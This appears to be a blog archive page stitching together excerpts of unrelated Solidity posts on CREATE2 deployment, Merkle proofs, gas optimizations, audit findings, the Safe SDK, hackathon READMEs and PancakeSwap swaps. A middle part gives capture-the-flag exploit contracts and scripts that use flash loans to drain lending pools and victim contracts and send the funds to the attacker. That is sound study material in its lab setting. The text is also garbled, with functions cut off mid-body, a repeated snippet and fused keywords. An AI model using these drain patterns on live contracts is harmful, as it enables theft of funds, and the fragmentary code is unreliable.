There are 2 major ways to deploy smart contract CREATE and CREATE2. They look quite similar, but there are still some differences.CREATE2 and CREATE are one of solidity opcode which give us the ability to predict the address where a contract will be deployed before we deploy a smart contract.You might be curious about what opcode is.Opcodes are the fundamental building blocks of EVM bytecode, and each opcode represents a specific operation that the EVM can perform. For example, there are opcodes for arithmetic operations, logical operations, storage access, memory manipulation, conditional branching, and more.
What is CREATE
Smart contracts can be created both by other contracts and regular EOA.They both compute the new address the same way:
1
new_address = keccak256(sender, nonce)
So each created address is associated with a nonce value.Nonce increased on every transaction.It is related to the number of transactions we make and is unpredictable. That’s why we need CREATE2.
What is CREATE2 ?
The whole idea behind this opcode is to make the resulting address independent of future events. Regardless of what may happen on the blockchain, it will always be possible to deploy the contract at the precomputed address.There are four parameters in CREATE2 function:
Imagine a scenario where you need to deploy a contract to multiple networks, and precisely at that moment, you need to store the addresses of the yet-to-be-deployed contracts as storage parameters within the currently deployed contract. In such cases, you would require knowing the future addresses of the contracts to be deployed in advance.
function deploy( bytes memory bytecode, uint _salt ) public payable returns (address) { address addr;
assembly { addr := create2( callvalue(), // wei sent with current call // Actual code starts after skipping the first 32 bytes add(bytecode, 0x20), mload(bytecode), // Load the size of code contained in the first 32 bytes _salt // Salt from function arguments )
Merkle trees, named after Ralph Merkle, are a fundamental data structure used in cryptography and computer science. They are commonly employed in blockchain systems to ensure data integrity and enable efficient verification.
The principle behind Merkle trees is based on the concept of hash functions. A hash function is a mathematical algorithm that takes an input (data) and produces a fixed-size output, known as a hash value or digest. The key properties of a hash function are collision resistance and the avalanche effect.
how to generate merkle tree data via solidity
we can calculate hash value through solidity keccak256 function:
1 2 3 4 5 6 7 8
keccak256(abi.encodePacked(toHashValue)
e.g.: before hash 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2
after hash 0x999bf57501565dbd2fdcea36efa2b9aef8340a8901e3459f4a4c926275d36cdb
After performing the hash operation on the values of the leaf nodes, the adjacent nodes are then hashed together until only a single root node remains.
Suppose there are two adjacent nodes, A and B. The order of the hash operation, whether it is hash(A+B) or hash(B+A), is determined by the sizes of A and B. In the corresponding Merkle code in OpenZeppelin, we can find the following code snippet:
1 2 3
function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) { return a < b ? _efficientHash(a, b) : _efficientHash(b, a); }
In summary, the smaller value is typically placed in front to determine the order for computing the hash values. This may cause some confusion when performing the calculations manually.
In practical projects, it is common to store only the final result, the root hash value, in the contract. Storing a large number of addresses in the contract would consume a significant amount of gas fees. By using a Merkle tree calculation, the amount of data that needs to be stored is greatly reduced.
Let’s demonstrate how to calculate and store the root hash value using a setup example from Foundry:
bytes32 public root; bytes32[] public leafs; bytes32[] public l2;
function setUp() public { address[] memory addrss = new address[](4); addrss[0] = 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2; addrss[1] = 0x2d886570A0dA04885bfD6eb48eD8b8ff01A0eb7e; addrss[2] = 0xed857ac80A9cc7ca07a1C213e79683A1883df07B; addrss[3] = 0x690B9A9E9aa1C9dB991C7721a92d351Db4FaC990;
//Calculating the hash values of leaf nodes from a list of addresses. leafs.push(keccak256(abi.encodePacked(addrss[0]))); leafs.push(keccak256(abi.encodePacked(addrss[1]))); leafs.push(keccak256(abi.encodePacked(addrss[2]))); leafs.push(keccak256(abi.encodePacked(addrss[3])));
//Calculating the hash values of the second level. l2.push(keccak256(abi.encodePacked(leafs[0], leafs[1]))); l2.push(keccak256(abi.encodePacked(leafs[2], leafs[3])));
For demonstration purposes, we have provided only four addresses. In actual projects, the number of addresses can be significantly larger.
how to proof merkle data
Once we have stored the root hash value in the contract, how do we verify if a client-provided address is a valid address or belongs to a whitelist?
Firstly, we need to hash the address as the third parameter. Then, we pass the hash value of the address, along with the adjacent hash values, as the proof to the verification function.
The proof list corresponds to the red-marked area in the image below.
test proof function:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
function testVerify() public { address proofAddress = 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2;
function parentHash(bytes32 a, bytes32 b) public pure returns (bytes32) { if (a < b) { return keccak256(abi.encode(a, b)); } else { return keccak256(abi.encode(b, a)); } }
The statement “abi.encode(address, uint)” will produce 64 bytes. Since “abi.encode(bytes32, bytes32)” also yields 64 bytes, hash collisions may potentially occur between leaf nodes and parent nodes.
function parentHash(bytes32 a, bytes32 b) public pure returns (bytes32) { if (a < b) { return keccak256(abi.encode(a, b)); } else { return keccak256(abi.encode(b, a)); } }
function testLowLevelCallRevert() public { vm.expectRevert(bytes("error message")); (bool revertsAsExpected, ) = address(myContract).call(myCalldata); assertTrue(revertsAsExpected, "expectRevert: call did not revert"); }
Use our deployed contract to send back the token using deposit function.After the flashloan call withdraw function to take our tokens back. Do not forget to set the receive function for receiving tokens. Use _to.call function to send tokens,it is the current recommended method to use.
functionattack(SideEntranceLenderPool pool,address payable player) external { //make a flashloan pool.flashLoan(1000 ether); //get the money pool.withdraw(); //send to palyer (bool sent,) = player.call{value:1000 ether}(""); require(sent, "Failed to send Ether"); }
receive() external payable {} }
Challenge5
The reward pool only count the amount of deposit. We can use flash loan to borrow some DVT token and claim the reward token at the same time.Here goes the code:
functionreceiveFlashLoan(uint256 amount) external{ //do something. //deposit to reward pool //approve amount to the reward pool DVTtoken.approve(address(RewardPool),amount);
RewardPool.deposit(amount);
//claim the rewards RewardPool.distributeRewards();
//withdraw DVTtokens RewardPool.withdraw(amount);
//return back DVT token. DVTtoken.transfer(address(pool),amount);
//send reward token to our player. RdToken.transfer(owner,RdToken.balanceOf(address(this))); }
This challenge is similar to the previous one.Firstly we use flashloan borrow some DVT token.Secondly we use the DVT token make a governance action.Finally two days later we make a executeAction to claim the DVT token to our attack contact and send it to our player.Here goes the entire code:
Therefore, we use swap all our DVT token to ETH and then the number of uniswapPair.balance/token.balanceOf(uniswapPair) goes down.After that happened we can deposit our eth to borrow all the DVT token in lending pool.
//approve DVTtoken to uniswap pool token.approve(uniswapExchange,token.balanceOf(address(this)));
//swap all DVT token to eth in uniswap pool. UniswapExchangeInterface(uniswapExchange).tokenToEthSwapInput(token.balanceOf(address(this)), 1, block.timestamp+5);
//borrow DVT token by depositing eth. pool.borrow{value:address(this).balance}(token.balanceOf(address(pool)),msg.sender); }
There’s a pool with 1000 ETH in balance, offering flash loans. It has a fixed fee of 1 ETH. A user has deployed a contract with 10 ETH in balance. It’s capable of interacting with the pool and receiving flash loans of ETH. Take all ETH out of the user’s contract. If possible, in a single transaction.
The issue here is that the user contract does not authenticate the user to be the owner, so anyone can just take any flash loan on behalf of that contract. We can interact with pool contract directly to drain user’s contract like this:
1 2 3 4
constETH = await pool.ETH(); for (let i = 0; i < 10; i++) { await pool.connect(player).flashLoan(receiver.address, ETH, 0, "0x"); }
Or we can delpoy an attack contract to invoking pool contract:
Use .call instead of .transfer to send ether
.transfer will relay 2300 gas and .call will relay all the gas. If the receive/fallback function from the recipient proxy contract has complex logic, using .transfer will fail, causing integration issues.
Unbounded loop
1 2 3 4 5 6 7 8 9 10 11
function claimGovFees() public { address[] memory assets = bondNFT.getAssets();
- address public owner; + address public immutable owner;
mapping(address⇒bool) using bool for storage incurs overhead
1 2
- mapping(address => bool) public allowedAsset; + mapping(address => uint256) public allowedAsset;
Save gas with the use of the import statement
Solidity code is also cleaner in another way that might not be noticeable: the struct Point. We were importing it previously with global import but not using it. The Point struct polluted the source code with an unnecessary object we were not using because we did not need it.
This was breaking the rule of modularity and modular programming: only import what you need Specific imports with curly braces allow us to apply this rule better.
Recommendation:
import {contract1 , contract2} from "filename.sol";
Sort Solidity operations using short-circuit mode
//f(x) is a low gas cost operation
//g(y) is a high gas cost operation
//Sort operations with different gas costs as follows
f(x) || g(y)
f(x) && g(y)
Change for loop behavior by removing add (+1) and ++x is more gas efficient
1 2 3 4 5 6 7 8
functionbuy(uint256 _amount) external payable { ... - for (uint48 x = sale_.currentId + 1; x <= newId; x++) { + for (uint48 x = sale_.currentId; x < newId; ++x) { nft.mint(msg.sender, x); } ... }
Multiple access to mapping/array should use local variable cache
Duplicated require should be modifier or function
Use custom error rather than revert()/require()
Use calldata instead of memory for read-only variable
require()/revert() string longer than 32 bytes cost extra gas
Using Openzeppelin Ownable2Step.sol is gas efficient
Using UniswapV3 mulDiv function is gas-optimized
Use nested if and, avoid multiple check combinations
Avoid using state variable in emit (130 gas)
Instead of cache a whole object ,try cache single Attributes
Using int32 for time
Don’t use _msgSender() if not supporting EIP-2771
Using > 0 costs more gas than != 0 when used on a uint in a require() statement(version>0.8.13)
Using bools for storage incurs overhead
.length should not be looked up in every loop of a for-loop
Using calldata instead of memory for read-only arguments in external functions saves gas
Splitting require() statements that use && saves gas
Use a more recent version of solidity
require()/revert() strings longer than 32 bytes cost extra gas
+= costs more gas than = + for state variables
Using storage instead of memory for structs/arrays saves gas
After the contract is destroyed,the subsequent execution of the contract’s function buy() is going on.That causes the msg.value token to be lost in the contract forever.
Proof of concept
Note:When there is no code at the address, the transaction will succeed, and the msg.value will be stored in the contract.
Let’s say Alice and bob are invoking the contact simultaneously. The transactions are sent to the mempool. Alice is finished executes her transaction when bob is still waiting for his result. And then the contract is destroyed. Finally, bob finished his transaction and sent his token to this contract. This way bob’s token is lost and locked forever in this empty contract.
Recommended mitigation steps
Instead of using self-destruct, we could modify the state to represent the contract has completed the process.We could modify the code like this:
Safe provide a sdk to create a smart contract account which is a fully customizable acocunt. In crypto if you give away your private key,your money is gone.You can’t take them back.Smarct account is built to prevent those. Common usecase:
multiple-signer(2 or more)
set spending limit(e.g. $100 perday)
Smart Account vs Signing Accounts(EOA) Difference between two type of accounts
/* This Safe is tied to owner 1 because the factory was initialized with an adapter that had owner 1 as the signer. */ const safeSdkOwner1 = await safeFactory.deploySafe({ safeAccountConfig });
const safeAddress = safeSdkOwner1.getAddress();
console.log("Your Safe has been deployed:"); console.log(`https://goerli.etherscan.io/address/${safeAddress}`); console.log(`https://app.safe.global/gor:${safeAddress}`);
auth Kit
The Auth kit creates an Ethereum address and authenticates a blockchain account using an email address, social media account, or traditional crypto wallets like Metamask.
safeAuthKit.subscribe(SafeAuthEvents.SIGN_OUT, () => { console.log("User is not authenticated"); });
const safeAuthKit = awaitSafeAuthKit.init(SafeAuthProviderType.Web3Auth, { ... txServiceUrl: 'https://safe-transaction-goerli.safe.global'// Add the corresponding transaction service url depending on the network. Other networks: https://docs.gnosis-safe.io/learn/infrastructure/available-services#safe-transaction-service authProviderConfig: { ... } })
relay kit
The Relay Kit allows users to pay transaction fees (gas fees) using the native blockchain token or ERC-20 tokens. This allows you to pay gas fees using any ERC-20 token in your Safe, even if you don’t have ETH.
constoptions: MetaTransactionOptions = { isSponsored: true, // This parameter is mandatory to use the 1Balance method }; relayAdapter.relayTransaction({ target: "0x...", // the Safe address encodedTransaction: "0x...", // Encoded Safe transaction data chainId: 5, options, });
onramp kit
This package is provided for testing purposes only
Modules are smart contracts that add custom features to Safe contracts. They separate module logic from the Safe’s core contract, and are added or removed with confirmation from all owners. Modules are critical for security and emit events when added, removed, or when module transactions succeed or fail. There are many types of modules, including daily spending allowances, recurring transactions, standing orders, and social recovery modules, which can help you recover a Safe if you lose access to owner accounts. Modules can be used in various ways to enhance your Safe’s functionality.
Guards
Transaction guards can make checks before and after a Safe transaction.
Voucher can be counted arbitrary many times in staker’s lockedCoinAge. If a voucher has maximized its trust then its locked is added to the lockedCoinAge each time fully as its lastUpdated is kept intact. This provides a surface to grow lockedCoinAge as big as an attacker wants, increasing it by current_block_difference * vouch.locked on each transaction.
uint256 lastWithdrawRewards = getLastWithdrawRewards[vouch.staker]; stakers[vouch.staker].lockedCoinAge += (block.number - _max(lastWithdrawRewards, uint256(vouch.lastUpdated))) * uint256(vouch.locked); if (lock) { // Look up the staker and determine how much unlock stake they // have available for the borrower to borrow. If there is 0 // then continue to the next voucher in the array uint96 stakerLocked = stakers[vouch.staker].locked; uint96 stakerStakedAmount = stakers[vouch.staker].stakedAmount; uint96 availableStake = stakerStakedAmount - stakerLocked; uint96 lockAmount = _min(availableStake, vouch.trust - vouch.locked); if (lockAmount == 0) continue; // Calculate the amount to add to the lock then // add the extra amount to lock to the stakers locked amount // and also update the vouches locked amount and lastUpdated block innerAmount = _min(remaining, lockAmount); stakers[vouch.staker].locked = stakerLocked + innerAmount; vouch.locked += innerAmount; vouch.lastUpdated = uint64(block.number); } else { // Look up how much this vouch has locked. If it is 0 then // continue to the next voucher. Then calculate the amount to // unlock which is the min of the vouches lock and what is // remaining to unlock uint96 locked = vouch.locked; if (locked == 0) continue; innerAmount = _min(locked, remaining); // Update the stored locked values and last updated block stakers[vouch.staker].locked -= innerAmount; vouch.locked -= innerAmount; vouch.lastUpdated = uint64(block.number); }
Above code is invoked where user called borrow() function with amount>minBorrow: code
1 2 3 4 5 6 7 8 9 10 11
function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant { IAssetManager assetManagerContract = IAssetManager(assetManager); if (amount < minBorrow) revert AmountLessMinBorrow(); if (amount > getRemainingDebtCeiling()) revert AmountExceedGlobalMax();
...
// Call update locked on the userManager to lock this borrowers stakers. This function // will revert if the account does not have enough vouchers to cover the borrow amount. ie // the borrower is trying to borrow more than is able to be underwritten IUserManager(userManager).updateLocked(msg.sender, (actualAmount + fee).toUint96(), true);
When vouch.trust == vouch.locked the value of lockAmount goes to zero. And the loop continued.Thus the value of lastUpdated doesn’t updated.
Suppose Bob the staker has a vouch with trust maxxed, i.e. vouch.trust = vouch.locked = 10k DAI. He can setup a second borrower being his own account, some minimal trust, then can run min borrow many, many times, gaining huge stakers[vouch.staker].lockedCoinAge as vouch.lastUpdated aren’t updated and lockedCoinAge grows with a positive some_number_of_blocks * 10k DAI number each time Bob borrows 1 DAI via his second borrower.
if (token.balanceOf(address(this)) < balanceBefore) revert RepayFailed();
returntrue; }
Target here means address of the DVT token that we deployed before.Thus we can use this call to approve amount to attacker address.Let's jump into code:
Firstly, we need an abi string about the approve function. Secondly,make a flash loan via pool address. Finally,transfer all amount of pool DVT token to msg.sender(palyer).
hardhat test script
1 2 3 4 5 6
//deploy the attack contract attack = await ( await ethers.getContractFactory("TrusterAttack", player) ).deploy(); //invoke attack contract via player address. await attack.connect(player).attack(pool.address, token.address);
A hackathon is an event where developers, designers, and other tech enthusiasts come together to collaborate on a project. At the end of the event, all teams present their projects to a panel of judges. A hackathon readme document is a crucial part of presenting your project. It provides details about your project, how to use it, and how to contribute to it. In this blog post, we will discuss how to write a hackathon readme document that will help you present your project effectively.
why we need a readme document
The purpose of writing a README document is to provide information about a project or software. It should include instructions on how to install and use the software, as well as any dependencies or requirements. The document should also provide an overview of the project and its goals, as well as any relevant background information. Additionally, it should cover any edge cases or potential issues that users might encounter, and provide instructions on how to address them. Finally, it should include information on how to contribute to the project, as well as any testing or quality assurance protocols that are in place.
what should be included in readme document
live links
After the entire project is finished,we should deploy it on the server. Thus hackathon judgers can review our project by click the link.Additionally we should upload a video about how to use it to youtube.Here is the example:
Directory tree gives a quick view of our whole project.Hakcathon judgers can quickly find what they want from the directory tree.And it is quite easy to generate the directory tree by using linux command:
tree -L {max-depth}
Here goes the output of this command
flowchart
A project flowchart is a visual representation of the sequence of steps in a project. It helps in identifying process inefficiencies, improving communication, and ensuring everyone involved in the project is on the same page.I recommend to use “miro” to draw a flowchart. Miro is the online collaborative whiteboard platform that enables distributed teams to work effectively together, from brainstorming with digital sticky notes to planning and managing agile workflows. Here goes a example generate with miro:
install
The install command is depends on the teck stack you use.Let us say you building with react and node.We have to install all dependencies before we run the server.
1 2
npm install npm run dev
api document
API stands for Application Programming Interface. It is a set of protocols, routines, and tools for building software and applications. Documentation is an essential part of the development process because it enables developers to understand the functionality of the API.
tech stack
When it comes to building a software project, one of the most important decisions you’ll make is choosing the right tech stack. A tech stack is the combination of technologies and programming languages used to build a software application. It’s important to choose the right tech stack because it can affect the performance, scalability, and maintainability of your project.We can also list the teck stack in our readme document like this:
next.js
tailwindcss
solidity
uniswap v3 protocol
reference
References are important for several reasons. First, they provide evidence to support your arguments, which adds credibility to your work. Second, references allow readers to verify the information you have presented. Third, references demonstrate that you have done your research and are knowledgeable about your topic. Finally, they show that you are giving credit to the original authors for their ideas and work.
A code license is a legal agreement that outlines the terms and conditions for the use, distribution, and modification of a piece of code. SPDX short identifier: MIT
In this article i gonna show you how to make a swap using pancakeswap smart router in solidity contract.Here wo go. In this example i swap BUSD token to CAKE.Here is the address of each token:
Let’s go dive into the deep.Firstly we need set a swap amount, eg:0.01 BUSD, an wed need a min out amount as well.The last parameter is path which means the path of swap tokens.When we swap busd to cake we can find a pool consist of busd and cake。So the path is simple.For some other tokens maybe the path is a litte bit longer.We have to use two or three or more pools to get the token we want. In the pancakeswap front-end page , it returns a path before we make the swap. In the solidity code we have to do it ourself.We have to get the optimal path before we make the swap.Let’s dive into the pancakeswap smart router code.
There are so many swap function we can use to help use swap tokens. In this demo we use swapExactTokensForTokens. As you see there is a function named swapExactTokensForTokensSupportingFeeOnTransferTokens. We need to know what’s the difference between this two functions.
functionswapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external virtual override ensure(deadline) { // transfer token from sender address to pool[0] TransferHelper.safeTransferFrom( path[0], msg.sender, PancakeLibrary.pairFor(factory, path[0], path[1]), amountIn );
// the balance of des token that receiver hold. uint balanceBefore = IERC20(path[path.length - 1]).balanceOf(to);
// make the sawp. _swapSupportingFeeOnTransferTokens(path, to);
// make sure the out token is bigger than the set amountOutMin value. require( IERC20(path[path.length - 1]).balanceOf(to).sub(balanceBefore) >= amountOutMin, 'PancakeRouter: INSUFFICIENT_OUTPUT_AMOUNT' ); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
functionswapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external virtual override ensure(deadline) returns (uint[] memory amounts) { // get the out amount using PancakeLibrary via amountIn. amounts = PancakeLibrary.getAmountsOut(factory, amountIn, path);
// after calculate all result make sure the out amount is bigger than amountOutMin. require(amounts[amounts.length - 1] >= amountOutMin, 'PancakeRouter: INSUFFICIENT_OUTPUT_AMOUNT');
After compare the above two functions we know the difference. In the swapExactTokensForTokens function the exact transfer amount is set by PancakeLibrary getAmountsOut. And in this article we use swapExactTokensForTokensSupportingFeeOnTransferTokens. Here is the entire code from github gist : code